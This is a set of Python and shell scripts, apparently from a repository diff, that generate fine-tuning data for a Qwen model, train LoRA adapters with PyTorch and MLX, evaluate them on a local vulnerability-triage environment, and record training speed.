| 72 |
+
eos_token_id=tokenizer.eos_token_id,
|
| 73 |
+
)
|
| 74 |
+
prompt_length = encoded["input_ids"].shape[1]
|
| 75 |
+
output_text = tokenizer.decode(generated[0][prompt_length:], skip_special_tokens=True).strip()
|
| 76 |
+
payload = maybe_parse_action(output_text)
|
| 77 |
+
if payload is None:
|
| 78 |
+
return {
|
| 79 |
+
"action_type": "submit_triage",
|
| 80 |
+
"rationale": f"Fallback because model output could not be parsed: {output_text[:120]}",
|
| 81 |
+
}
|
| 82 |
+
return payload
|
| 83 |
+
|
| 84 |
+
|
| 85 |
+
def run_episode(model, tokenizer, device: str, task_id: str) -> Dict[str, object]:
|
| 86 |
+
env = VulnTriageEnvironment()
|
| 87 |
+
observation = env.reset(task_id=task_id).model_dump()
|
| 88 |
+
actions: List[Dict[str, object]] = []
|
| 89 |
+
while not observation["done"]:
|
| 90 |
+
action_payload = next_action(model, tokenizer, device, observation)
|
| 91 |
+
action = VulnTriageAction.model_validate(action_payload)
|
| 92 |
+
actions.append(action.model_dump(exclude_none=True))
|
| 93 |
+
observation = env.step(action).model_dump()
|
| 94 |
+
return {
|
| 95 |
+
"task_id": task_id,
|
| 96 |
+
"difficulty": observation["difficulty"],
|
| 97 |
+
"final_score": float(observation.get("final_score") or 0.0),
|
| 98 |
+
"score_breakdown": observation["score_breakdown"],
|
| 99 |
+
"steps_used": len(actions),
|
| 100 |
+
"actions": actions,
|
| 101 |
+
}
|
| 102 |
+
|
| 103 |
+
|
| 104 |
+
def main() -> None:
|
| 105 |
+
parser = argparse.ArgumentParser()
|
| 106 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 107 |
+
parser.add_argument("--adapter-path")
|
| 108 |
+
parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
|
| 109 |
+
parser.add_argument("--output-json")
|
| 110 |
+
args = parser.parse_args()
|
| 111 |
+
|
| 112 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 113 |
+
model, tokenizer, device = load_model(args.model, args.adapter_path, output_root)
|
| 114 |
+
episodes = [run_episode(model, tokenizer, device, task_id) for task_id in TASK_ORDER]
|
| 115 |
+
average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
|
| 116 |
+
payload = {
|
| 117 |
+
"model": args.model,
|
| 118 |
+
"adapter_path": args.adapter_path,
|
| 119 |
+
"device": device,
|
| 120 |
+
"average_score": average_score,
|
| 121 |
+
"episodes": episodes,
|
| 122 |
+
}
|
| 123 |
+
if args.output_json:
|
| 124 |
+
output_path = Path(args.output_json)
|
| 125 |
+
if not output_path.is_absolute():
|
| 126 |
+
output_path = (ROOT / output_path).resolve()
|
| 127 |
+
output_path.parent.mkdir(parents=True, exist_ok=True)
|
| 128 |
+
output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 129 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 130 |
+
|
| 131 |
+
|
| 132 |
+
if __name__ == "__main__":
|
| 133 |
+
main()
|
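A single-task smoke test of this evaluator; a sketch that downloads the base model on first use and assumes the default artifact layout:

from pathlib import Path

from scripts.evaluate_lora import load_model, run_episode

root = Path("artifacts/lora_qwen3_4b")
model, tokenizer, device = load_model("Qwen/Qwen3.5-4B", None, root)  # no adapter: base model
result = run_episode(model, tokenizer, device, "task_easy_guarddog")
print(result["final_score"], result["steps_used"])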
scripts/evaluate_mlx.py
ADDED
@@ -0,0 +1,137 @@
"""Evaluate base or MLX-adapted Qwen models on the local vulnops environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import re
|
| 8 |
+
import sys
|
| 9 |
+
from pathlib import Path
|
| 10 |
+
from typing import Dict, List
|
| 11 |
+
|
| 12 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 13 |
+
if str(ROOT) not in sys.path:
|
| 14 |
+
sys.path.insert(0, str(ROOT))
|
| 15 |
+
|
| 16 |
+
from mlx_lm import generate, load
|
| 17 |
+
from mlx_lm.sample_utils import make_sampler
|
| 18 |
+
|
| 19 |
+
from models import VulnTriageAction
|
| 20 |
+
from server.cases import TASK_ORDER
|
| 21 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 22 |
+
from training_utils import render_prompt
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
THINK_BLOCK_RE = re.compile(r"<think>.*?</think>", re.DOTALL | re.IGNORECASE)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
def extract_last_json_object(text: str) -> str | None:
|
| 29 |
+
cleaned = THINK_BLOCK_RE.sub("", text).strip()
|
| 30 |
+
start = cleaned.find("{")
|
| 31 |
+
if start == -1:
|
| 32 |
+
return None
|
| 33 |
+
depth = 0
|
| 34 |
+
in_string = False
|
| 35 |
+
escape = False
|
| 36 |
+
last_candidate = None
|
| 37 |
+
candidate_start = None
|
| 38 |
+
for index, ch in enumerate(cleaned):
|
| 39 |
+
if ch == "\\" and in_string and not escape:
|
| 40 |
+
escape = True
|
| 41 |
+
continue
|
| 42 |
+
if ch == '"' and not escape:
|
| 43 |
+
in_string = not in_string
|
| 44 |
+
escape = False
|
| 45 |
+
if in_string:
|
| 46 |
+
continue
|
| 47 |
+
if ch == "{":
|
| 48 |
+
if depth == 0:
|
| 49 |
+
candidate_start = index
|
| 50 |
+
depth += 1
|
| 51 |
+
elif ch == "}":
|
| 52 |
+
depth -= 1
|
| 53 |
+
if depth == 0 and candidate_start is not None:
|
| 54 |
+
last_candidate = cleaned[candidate_start : index + 1]
|
| 55 |
+
return last_candidate
|
| 56 |
+
|
| 57 |
+
|
| 58 |
+
def parse_action_output(text: str) -> Dict[str, object] | None:
|
| 59 |
+
candidate = extract_last_json_object(text)
|
| 60 |
+
if candidate is None:
|
| 61 |
+
return None
|
| 62 |
+
try:
|
| 63 |
+
payload = json.loads(candidate)
|
| 64 |
+
action = VulnTriageAction.model_validate(payload)
|
| 65 |
+
except Exception:
|
| 66 |
+
return None
|
| 67 |
+
return action.model_dump(exclude_none=True)
|
| 68 |
+
|
| 69 |
+
|
| 70 |
+
def next_action(model, tokenizer, observation: Dict[str, object]) -> Dict[str, object]:
|
| 71 |
+
prompt = render_prompt(
|
| 72 |
+
observation=observation,
|
| 73 |
+
prompt_variant="Return only the best next action in JSON.",
|
| 74 |
+
)
|
| 75 |
+
output = generate(
|
| 76 |
+
model,
|
| 77 |
+
tokenizer,
|
| 78 |
+
prompt=prompt,
|
| 79 |
+
verbose=False,
|
| 80 |
+
max_tokens=192,
|
| 81 |
+
sampler=make_sampler(temp=0.0),
|
| 82 |
+
)
|
| 83 |
+
payload = parse_action_output(output)
|
| 84 |
+
if payload is None:
|
| 85 |
+
return {
|
| 86 |
+
"action_type": "submit_triage",
|
| 87 |
+
"rationale": f"Fallback because model output could not be parsed: {output[:120]}",
|
| 88 |
+
}
|
| 89 |
+
return payload
|
| 90 |
+
|
| 91 |
+
|
| 92 |
+
def run_episode(model, tokenizer, task_id: str) -> Dict[str, object]:
|
| 93 |
+
env = VulnTriageEnvironment()
|
| 94 |
+
observation = env.reset(task_id=task_id).model_dump()
|
| 95 |
+
actions: List[Dict[str, object]] = []
|
| 96 |
+
while not observation["done"]:
|
| 97 |
+
action_payload = next_action(model, tokenizer, observation)
|
| 98 |
+
action = VulnTriageAction.model_validate(action_payload)
|
| 99 |
+
actions.append(action.model_dump(exclude_none=True))
|
| 100 |
+
observation = env.step(action).model_dump()
|
| 101 |
+
return {
|
| 102 |
+
"task_id": task_id,
|
| 103 |
+
"difficulty": observation["difficulty"],
|
| 104 |
+
"final_score": float(observation.get("final_score") or 0.0),
|
| 105 |
+
"score_breakdown": observation["score_breakdown"],
|
| 106 |
+
"steps_used": len(actions),
|
| 107 |
+
"actions": actions,
|
| 108 |
+
}
|
| 109 |
+
|
| 110 |
+
|
| 111 |
+
def main() -> None:
|
| 112 |
+
parser = argparse.ArgumentParser()
|
| 113 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 114 |
+
parser.add_argument("--adapter-path")
|
| 115 |
+
parser.add_argument("--output-json")
|
| 116 |
+
args = parser.parse_args()
|
| 117 |
+
|
| 118 |
+
model, tokenizer = load(args.model, adapter_path=args.adapter_path)
|
| 119 |
+
episodes = [run_episode(model, tokenizer, task_id) for task_id in TASK_ORDER]
|
| 120 |
+
average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
|
| 121 |
+
payload = {
|
| 122 |
+
"model": args.model,
|
| 123 |
+
"adapter_path": args.adapter_path,
|
| 124 |
+
"average_score": average_score,
|
| 125 |
+
"episodes": episodes,
|
| 126 |
+
}
|
| 127 |
+
if args.output_json:
|
| 128 |
+
out = Path(args.output_json)
|
| 129 |
+
if not out.is_absolute():
|
| 130 |
+
out = (ROOT / out).resolve()
|
| 131 |
+
out.parent.mkdir(parents=True, exist_ok=True)
|
| 132 |
+
out.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 133 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 134 |
+
|
| 135 |
+
|
| 136 |
+
if __name__ == "__main__":
|
| 137 |
+
main()
|
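The brace-matching approach above is the load-bearing trick: chat models often wrap the action JSON in prose or a <think> block, so json.loads on the raw output would fail. A minimal standalone sketch of the same idea, simplified by dropping the string/escape tracking the real function does (so braces inside JSON strings would fool this version):

import json
import re

THINK_RE = re.compile(r"<think>.*?</think>", re.DOTALL | re.IGNORECASE)

def last_json_object(text: str) -> dict | None:
    # Strip any reasoning block, then return the last balanced {...} span.
    cleaned = THINK_RE.sub("", text)
    depth, start, candidate = 0, None, None
    for i, ch in enumerate(cleaned):
        if ch == "{":
            if depth == 0:
                start = i
            depth += 1
        elif ch == "}" and depth:
            depth -= 1
            if depth == 0:
                candidate = cleaned[start : i + 1]
    if candidate is None:
        return None
    try:
        return json.loads(candidate)
    except json.JSONDecodeError:
        return None

# Sample output is invented for illustration.
print(last_json_object('<think>draft</think>Best move: {"action_type": "submit_triage"}'))
# -> {'action_type': 'submit_triage'}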
scripts/generate_sft_data.py
ADDED
@@ -0,0 +1,116 @@
"""Generate resumable SFT data from deterministic heuristic rollouts."""

from __future__ import annotations

import argparse
import json
import sys
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

from training_utils import (
    PROMPT_VARIANTS,
    append_jsonl,
    build_text_example,
    generate_heuristic_transitions,
    split_for_key,
    write_json,
)


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
    parser.add_argument("--augmentations", type=int, default=12)
    parser.add_argument("--eval-ratio", type=float, default=0.2)
    parser.add_argument("--force", action="store_true")
    args = parser.parse_args()

    output_root = (ROOT / args.output_root).resolve()
    data_dir = output_root / "data"
    transitions_path = data_dir / "transitions.jsonl"
    train_path = data_dir / "train.jsonl"
    eval_path = data_dir / "eval.jsonl"
    manifest_path = output_root / "run_manifest.json"

    if args.force:
        for path in (transitions_path, train_path, eval_path):
            if path.exists():
                path.unlink()

    if transitions_path.exists() and train_path.exists() and eval_path.exists():
        print(json.dumps({"status": "already_exists", "output_root": str(output_root)}, indent=2))
        return

    transition_count = 0
    train_examples = 0
    eval_examples = 0

    for transition in generate_heuristic_transitions():
        record = {
            "task_id": transition.task_id,
            "difficulty": transition.difficulty,
            "step_index": transition.step_index,
            "observation": transition.observation,
            "action": transition.action,
            "reward_after_action": transition.reward_after_action,
            "score_after_action": transition.score_after_action,
            "done": transition.done,
        }
        append_jsonl(transitions_path, record)
        transition_count += 1

        for augmentation_index in range(args.augmentations):
            prompt_variant = PROMPT_VARIANTS[augmentation_index % len(PROMPT_VARIANTS)]
            example = build_text_example(
                observation=transition.observation,
                action=transition.action,
                prompt_variant=prompt_variant,
            )
            example_record = {
                "id": f"{transition.task_id}-step{transition.step_index}-aug{augmentation_index}",
                "task_id": transition.task_id,
                "difficulty": transition.difficulty,
                "step_index": transition.step_index,
                "prompt_variant": prompt_variant,
                **example,
            }
            split = split_for_key(example_record["id"], args.eval_ratio)
            append_jsonl(train_path if split == "train" else eval_path, example_record)
            if split == "train":
                train_examples += 1
            else:
                eval_examples += 1

    write_json(
        manifest_path,
        {
            "status": "data_ready",
            "output_root": str(output_root),
            "transition_count": transition_count,
            "train_examples": train_examples,
            "eval_examples": eval_examples,
            "augmentations": args.augmentations,
            "eval_ratio": args.eval_ratio,
        },
    )

    print(
        json.dumps(
            {
                "status": "ok",
                "output_root": str(output_root),
                "transition_count": transition_count,
                "train_examples": train_examples,
                "eval_examples": eval_examples,
            },
            indent=2,
        )
    )


if __name__ == "__main__":
    main()
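After a run, the split files are plain JSONL, so sanity checks need nothing beyond the standard library. A quick inspection sketch, assuming the default --output-root above:

import json
from collections import Counter
from pathlib import Path

# Count training examples per difficulty band in the generated split.
path = Path("artifacts/lora_qwen3_4b/data/train.jsonl")
rows = [json.loads(line) for line in path.read_text(encoding="utf-8").splitlines() if line.strip()]
print(len(rows), Counter(row["difficulty"] for row in rows))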
scripts/prepare_mlx_data.py
ADDED
@@ -0,0 +1,145 @@
"""Prepare MLX-LM-compatible train/valid files from existing SFT data."""

from __future__ import annotations

import argparse
import json
from pathlib import Path
from typing import Dict, List

from transformers import AutoTokenizer


ROOT = Path(__file__).resolve().parents[1]
TRUNCATION_MARKER = "\n...[truncated observation]...\n"


def load_jsonl(path: Path) -> List[Dict[str, object]]:
    with path.open("r", encoding="utf-8") as handle:
        return [json.loads(line) for line in handle if line.strip()]


def dump_jsonl(path: Path, rows: List[Dict[str, object]]) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    with path.open("w", encoding="utf-8") as handle:
        for row in rows:
            handle.write(json.dumps(row, sort_keys=True) + "\n")


def trim_prompt_to_budget(prompt: str, tokenizer, budget: int) -> str:
    prompt_ids = tokenizer.encode(prompt, add_special_tokens=False)
    if len(prompt_ids) <= budget:
        return prompt

    marker_ids = tokenizer.encode(TRUNCATION_MARKER, add_special_tokens=False)
    marker_len = len(marker_ids)
    if budget <= marker_len + 8:
        return tokenizer.decode(prompt_ids[-budget:])

    remaining = budget - marker_len
    head_len = max(1, int(remaining * 0.55))
    tail_len = max(1, remaining - head_len)
    trimmed_ids = prompt_ids[:head_len] + marker_ids + prompt_ids[-tail_len:]
    if len(trimmed_ids) > budget:
        trimmed_ids = trimmed_ids[:budget]
    return tokenizer.decode(trimmed_ids, skip_special_tokens=False)


def rendered_length(prompt: str, completion: str, tokenizer) -> int:
    messages = [
        {"role": "user", "content": prompt},
        {"role": "assistant", "content": completion},
    ]
    return len(tokenizer.apply_chat_template(messages, return_dict=False))


def normalize_record(record: Dict[str, object], tokenizer, max_seq_length: int) -> tuple[Dict[str, object] | None, Dict[str, int]]:
    prompt = str(record["prompt"])
    completion = str(record["completion"])

    stats = {"trimmed": 0, "dropped": 0}
    completion_ids = tokenizer.encode(completion, add_special_tokens=False)
    prompt_budget = max_seq_length - len(completion_ids) - 32
    if prompt_budget <= 0:
        stats["dropped"] = 1
        return None, stats

    normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
    while rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length and prompt_budget > 64:
        prompt_budget = max(64, int(prompt_budget * 0.9))
        normalized_prompt = trim_prompt_to_budget(prompt, tokenizer, prompt_budget)
    if rendered_length(normalized_prompt, completion, tokenizer) > max_seq_length:
        stats["dropped"] = 1
        return None, stats

    if normalized_prompt != prompt:
        stats["trimmed"] = 1

    text = f"{normalized_prompt}\n{completion}"
    normalized = dict(record)
    normalized["prompt"] = normalized_prompt
    normalized["text"] = text
    return normalized, stats


def transform_split(src: Path, dst: Path, tokenizer, max_seq_length: int) -> Dict[str, int]:
    rows = load_jsonl(src)
    normalized_rows: List[Dict[str, object]] = []
    stats = {"input_examples": len(rows), "written_examples": 0, "trimmed_examples": 0, "dropped_examples": 0}

    for row in rows:
        normalized, row_stats = normalize_record(row, tokenizer, max_seq_length)
        stats["trimmed_examples"] += row_stats["trimmed"]
        stats["dropped_examples"] += row_stats["dropped"]
        if normalized is not None:
            normalized_rows.append(normalized)

    stats["written_examples"] = len(normalized_rows)
    dump_jsonl(dst, normalized_rows)
    return stats


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
    parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b/data")
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--max-seq-length", type=int, default=1024)
    parser.add_argument("--include-valid", action="store_true")
    parser.add_argument("--force", action="store_true")
    args = parser.parse_args()

    source_root = (ROOT / args.source_root).resolve()
    output_root = (ROOT / args.output_root).resolve()
    output_root.mkdir(parents=True, exist_ok=True)

    tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)

    mapping = {source_root / "train.jsonl": output_root / "train.jsonl"}
    if args.include_valid:
        mapping[source_root / "eval.jsonl"] = output_root / "valid.jsonl"

    summary: Dict[str, object] = {
        "model": args.model,
        "max_seq_length": args.max_seq_length,
        "splits": {},
    }
    for src, dst in mapping.items():
        if not src.exists():
            raise FileNotFoundError(f"Missing source file: {src}")
        if dst.exists() and not args.force:
            continue
        summary["splits"][dst.stem] = transform_split(src, dst, tokenizer, args.max_seq_length)

    valid_path = output_root / "valid.jsonl"
    if not args.include_valid and valid_path.exists():
        valid_path.unlink()

    summary_path = output_root.parent / "prepare_stats.json"
    summary_path.write_text(json.dumps(summary, indent=2, sort_keys=True) + "\n", encoding="utf-8")
    print(output_root)
    print(json.dumps(summary, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
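The trimming strategy keeps roughly the first 55% and last 45% of the token budget with a marker in between, on the theory that task framing lives at the head of the prompt and the most recent observation at the tail. A standalone sketch of that layout, using a plain list in place of real tokenizer ids (illustrative only):

# Sketch of trim_prompt_to_budget's head/tail split over plain ids.
MARKER = ["<truncated>"]

def trim(ids: list, budget: int) -> list:
    if len(ids) <= budget:
        return ids
    remaining = budget - len(MARKER)
    head = max(1, int(remaining * 0.55))
    tail = max(1, remaining - head)
    return (ids[:head] + MARKER + ids[-tail:])[:budget]

print(trim(list(range(20)), 10))
# -> [0, 1, 2, 3, '<truncated>', 15, 16, 17, 18, 19]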
scripts/run_lora_pipeline.py
ADDED
@@ -0,0 +1,135 @@
"""Run the full resumable local LoRA pipeline."""

from __future__ import annotations

import argparse
import json
import subprocess
import sys
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

from training_utils import latest_checkpoint, write_json


def run_step(name: str, command: list[str], log_path: Path, output_root: Path) -> None:
    log_path.parent.mkdir(parents=True, exist_ok=True)
    with log_path.open("a", encoding="utf-8") as log_handle:
        log_handle.write(f"\n===== {name} =====\n")
        log_handle.flush()
        write_json(
            output_root / "run_manifest.json",
            {
                "status": "running_step",
                "current_step": name,
                "command": command,
                "latest_checkpoint": str(latest_checkpoint(output_root / "checkpoints")) if (output_root / "checkpoints").exists() else None,
            },
        )
        process = subprocess.run(command, stdout=log_handle, stderr=subprocess.STDOUT, text=True)
    if process.returncode != 0:
        raise SystemExit(process.returncode)


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
    parser.add_argument("--augmentations", type=int, default=12)
    parser.add_argument("--skip-base-eval", action="store_true")
    args = parser.parse_args()

    output_root = (ROOT / args.output_root).resolve()
    logs_dir = output_root / "logs"
    output_root.mkdir(parents=True, exist_ok=True)

    if not args.skip_base_eval and not (output_root / "metrics" / "eval_before.json").exists():
        run_step(
            "eval_base",
            [
                sys.executable,
                "scripts/evaluate_lora.py",
                "--model",
                args.model,
                "--output-root",
                str(output_root),
                "--output-json",
                str(output_root / "metrics" / "eval_before.json"),
            ],
            logs_dir / "eval_base.log",
            output_root,
        )

    if not (output_root / "data" / "train.jsonl").exists():
        run_step(
            "generate_data",
            [
                sys.executable,
                "scripts/generate_sft_data.py",
                "--output-root",
                str(output_root),
                "--augmentations",
                str(args.augmentations),
            ],
            logs_dir / "generate_data.log",
            output_root,
        )

    run_step(
        "train_lora",
        [
            sys.executable,
            "scripts/train_lora_sft.py",
            "--model",
            args.model,
            "--output-root",
            str(output_root),
        ],
        logs_dir / "train_lora.log",
        output_root,
    )

    run_step(
        "eval_adapter",
        [
            sys.executable,
            "scripts/evaluate_lora.py",
            "--model",
            args.model,
            "--adapter-path",
            str(output_root / "adapter"),
            "--output-root",
            str(output_root),
            "--output-json",
            str(output_root / "metrics" / "eval_after.json"),
        ],
        logs_dir / "eval_adapter.log",
        output_root,
    )

    write_json(
        output_root / "run_manifest.json",
        {
            "status": "finished",
            "output_root": str(output_root),
            "eval_before": str(output_root / "metrics" / "eval_before.json"),
            "training_summary": str(output_root / "training_summary.json"),
            "eval_after": str(output_root / "metrics" / "eval_after.json"),
        },
    )
    print(
        json.dumps(
            {
                "status": "finished",
                "output_root": str(output_root),
            },
            indent=2,
        )
    )


if __name__ == "__main__":
    main()
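Each step rewrites run_manifest.json before launching its subprocess, so a crashed or in-flight pipeline can be inspected without tailing logs. A small status-check sketch, assuming the default output root:

import json
from pathlib import Path

manifest = Path("artifacts/lora_qwen3_4b/run_manifest.json")
state = json.loads(manifest.read_text(encoding="utf-8"))
print(state.get("status"), state.get("current_step"), state.get("latest_checkpoint"))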
scripts/run_mlx_benchmark.sh
ADDED
@@ -0,0 +1,29 @@
#!/bin/zsh
set -euo pipefail

ROOT="/Users/adithyavardhan/Tweeks/hack"
cd "$ROOT"

python scripts/prepare_mlx_data.py --force
mkdir -p artifacts/mlx_qwen3_4b/logs artifacts/mlx_qwen3_4b/metrics artifacts/mlx_qwen3_4b/adapters

python -m mlx_lm lora \
  --model Qwen/Qwen3.5-4B \
  --train \
  --data "$ROOT/artifacts/mlx_qwen3_4b/data" \
  --mask-prompt \
  --num-layers 8 \
  --batch-size 1 \
  --iters 10 \
  --val-batches 2 \
  --learning-rate 5e-5 \
  --steps-per-report 1 \
  --steps-per-eval 1000 \
  --save-every 10 \
  --grad-accumulation-steps 8 \
  --grad-checkpoint \
  --adapter-path "$ROOT/artifacts/mlx_qwen3_4b/adapters" \
  --max-seq-length 1024 \
  > "$ROOT/artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log" 2>&1

python scripts/save_mlx_speed.py
scripts/run_mlx_training.py
ADDED
@@ -0,0 +1,147 @@
"""Run MLX LoRA training as the default local Mac training path."""

from __future__ import annotations

import argparse
import json
import shlex
import subprocess
import sys
from pathlib import Path


ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))


def write_json(path: Path, payload: dict) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--source-root", default="artifacts/lora_qwen3_4b/data")
    parser.add_argument("--output-root", default="artifacts/mlx_qwen3_4b")
    parser.add_argument("--iters", type=int, default=120)
    parser.add_argument("--batch-size", type=int, default=1)
    parser.add_argument("--grad-accumulation-steps", type=int, default=8)
    parser.add_argument("--learning-rate", type=float, default=5e-5)
    parser.add_argument("--num-layers", type=int, default=8)
    parser.add_argument("--max-seq-length", type=int, default=1024)
    parser.add_argument("--steps-per-report", type=int, default=1)
    parser.add_argument("--save-every", type=int, default=20)
    parser.add_argument("--seed", type=int, default=7)
    parser.add_argument("--fresh-start", action="store_true")
    parser.add_argument("--include-valid", action="store_true")
    args = parser.parse_args()

    output_root = (ROOT / args.output_root).resolve()
    data_root = output_root / "data"
    log_path = output_root / "logs" / "mlx_train.log"
    manifest_path = output_root / "run_manifest.json"
    adapter_root = output_root / "adapters"
    adapter_file = adapter_root / "adapters.safetensors"
    speed_path = output_root / "metrics" / "speed_mlx.json"

    output_root.mkdir(parents=True, exist_ok=True)
    if args.fresh_start:
        for rel in [log_path, speed_path, output_root / "training_summary.json", adapter_file]:
            if rel.exists():
                rel.unlink()

    prepare_cmd = [
        sys.executable,
        "scripts/prepare_mlx_data.py",
        "--source-root",
        args.source_root,
        "--output-root",
        str(data_root.relative_to(ROOT)),
        "--model",
        args.model,
        "--max-seq-length",
        str(args.max_seq_length),
        "--force",
    ]
    if args.include_valid:
        prepare_cmd.append("--include-valid")
    subprocess.run(prepare_cmd, cwd=ROOT, check=True)

    cmd = [
        sys.executable,
        "-m",
        "mlx_lm",
        "lora",
        "--model",
        args.model,
        "--train",
        "--data",
        str(data_root),
        "--mask-prompt",
        "--num-layers",
        str(args.num_layers),
        "--batch-size",
        str(args.batch_size),
        "--iters",
        str(args.iters),
        "--learning-rate",
        str(args.learning_rate),
        "--steps-per-report",
        str(args.steps_per_report),
        "--steps-per-eval",
        "1000000",
        "--save-every",
        str(args.save_every),
        "--grad-accumulation-steps",
        str(args.grad_accumulation_steps),
        "--grad-checkpoint",
        "--adapter-path",
        str(adapter_root),
        "--max-seq-length",
        str(args.max_seq_length),
        "--seed",
        str(args.seed),
    ]
    if not args.fresh_start and adapter_file.exists():
        cmd.extend(["--resume-adapter-file", str(adapter_file)])

    write_json(
        manifest_path,
        {
            "status": "starting_training",
            "trainer": "mlx_lm_lora",
            "model": args.model,
            "data_root": str(data_root),
            "output_root": str(output_root),
            "command": cmd,
            "fresh_start": args.fresh_start,
        },
    )

    log_path.parent.mkdir(parents=True, exist_ok=True)
    with log_path.open("a", encoding="utf-8") as handle:
        handle.write("\n===== mlx_lm_lora =====\n")
        handle.write("COMMAND: " + " ".join(shlex.quote(part) for part in cmd) + "\n")
        handle.flush()
        process = subprocess.run(cmd, cwd=ROOT, stdout=handle, stderr=subprocess.STDOUT, text=True)

    subprocess.run([sys.executable, "scripts/save_mlx_speed.py", "--log-path", str(log_path), "--output-path", str(speed_path)], cwd=ROOT, check=False)

    summary = {
        "status": "finished" if process.returncode == 0 else "failed",
        "trainer": "mlx_lm_lora",
        "return_code": process.returncode,
        "log_path": str(log_path),
        "speed_path": str(speed_path),
        "adapter_root": str(adapter_root),
    }
    write_json(output_root / "training_summary.json", summary)
    write_json(manifest_path, summary)
    if process.returncode != 0:
        raise SystemExit(process.returncode)


if __name__ == "__main__":
    main()
scripts/save_mlx_speed.py
ADDED
@@ -0,0 +1,48 @@
"""Save a small speed summary from an MLX LoRA training log."""

from __future__ import annotations

import argparse
import json
import re
from pathlib import Path


ROOT = Path(__file__).resolve().parents[1]
REPORT_RE = re.compile(r"Iter\s+(\d+):\s+Train loss.*?It/sec\s+([0-9.]+)", re.IGNORECASE)


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--log-path", default="artifacts/mlx_qwen3_4b/logs/mlx_lora_benchmark.log")
    parser.add_argument("--output-path", default="artifacts/mlx_qwen3_4b/metrics/speed_mlx.json")
    args = parser.parse_args()

    log_path = (ROOT / args.log_path).resolve()
    output_path = (ROOT / args.output_path).resolve()
    text = log_path.read_text(encoding="utf-8") if log_path.exists() else ""

    records = []
    for step, it_per_sec in REPORT_RE.findall(text):
        itps = float(it_per_sec)
        records.append(
            {
                "step": int(step),
                "iterations_per_second": itps,
                "seconds_per_step_estimate": 1.0 / itps if itps > 0 else None,
            }
        )

    payload = {
        "method": "mlx_lm_lora",
        "source_log": str(log_path),
        "records": records,
        "latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
    }
    output_path.parent.mkdir(parents=True, exist_ok=True)
    output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
    print(json.dumps(payload, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
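The regex expects mlx_lm's per-iteration report lines. A quick check against a representative line (the field values below are invented for illustration, not from a real run):

import re

REPORT_RE = re.compile(r"Iter\s+(\d+):\s+Train loss.*?It/sec\s+([0-9.]+)", re.IGNORECASE)

line = "Iter 10: Train loss 1.892, Learning Rate 5e-05, It/sec 0.412, Tokens/sec 421.9"
step, itps = REPORT_RE.search(line).groups()
print(int(step), float(itps), 1.0 / float(itps))  # -> 10 0.412 ~2.43 s/step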
scripts/save_pytorch_baseline_speed.py
ADDED
@@ -0,0 +1,47 @@
"""Save a small speed summary from the current PyTorch training log."""

from __future__ import annotations

import json
import re
from pathlib import Path


ROOT = Path(__file__).resolve().parents[1]
LOG_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "logs" / "train_lora_manual.log"
OUT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"


STEP_RE = re.compile(r"(\d+)%\|.*?\|\s+(\d+)/(\d+)\s+\[(\d+):(\d+)<")


def main() -> None:
    text = LOG_PATH.read_text(encoding="utf-8") if LOG_PATH.exists() else ""
    matches = STEP_RE.findall(text)
    records = []
    for _pct, step, total, mins, secs in matches:
        step_num = int(step)
        elapsed_s = int(mins) * 60 + int(secs)
        if step_num > 0:
            records.append(
                {
                    "step": step_num,
                    "total_steps": int(total),
                    "elapsed_seconds": elapsed_s,
                    "seconds_per_step_estimate": elapsed_s / step_num,
                }
            )

    payload = {
        "method": "pytorch_mps_lora",
        "source_log": str(LOG_PATH),
        "records": records,
        "latest_seconds_per_step": records[-1]["seconds_per_step_estimate"] if records else None,
    }
    OUT_PATH.parent.mkdir(parents=True, exist_ok=True)
    OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
